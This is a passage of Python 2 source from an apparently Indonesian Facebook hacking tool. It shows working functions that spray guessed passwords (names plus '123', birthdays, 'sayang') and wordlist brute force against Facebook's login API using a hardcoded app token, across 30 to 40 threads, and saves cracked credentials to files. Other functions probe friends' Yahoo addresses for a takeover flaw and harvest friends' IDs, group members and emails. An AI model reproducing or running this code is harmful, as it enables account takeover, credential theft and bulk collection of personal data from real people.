data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + id + '&locale=en_US&password=' + pz5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
y = json.load(data)
if 'access_token' in y:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
if 'www.facebook.com' in y['error_msg']:
print '\x1b[1;91m[+] \x1b[1;92mFounded.'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName\x1b[1;97m : ' + a['name']
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername\x1b[1;97m : ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword\x1b[1;97m : ' + pz5
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
else:
print '\x1b[1;91m[!] Sorry, opening password target failed :('
print '\x1b[1;91m[!] Try other method.'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
except KeyError:
print '\x1b[1;91m[!] Terget not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def crack():
global file
global idlist
global passw
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97m')
try:
file = open(idlist, 'r')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
for x in range(40):
zedd = threading.Thread(target=scrak, args=())
zedd.start()
threads.append(zedd)
for zedd in threads:
zedd.join()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_hack()
def scrak():
global back
global berhasil
global cekpoint
global gagal
global up
try:
buka = open(idlist, 'r')
up = buka.read().split()
while file:
username = file.readline().strip()
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(0.01)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(0.01)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass1 + ' --> ' + b['name']
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass2 + ' --> ' + ['name']
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass3 + ' --> ' + b['name']
else:
pass4 = b['last_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']
else:
pass6 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(0.5)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
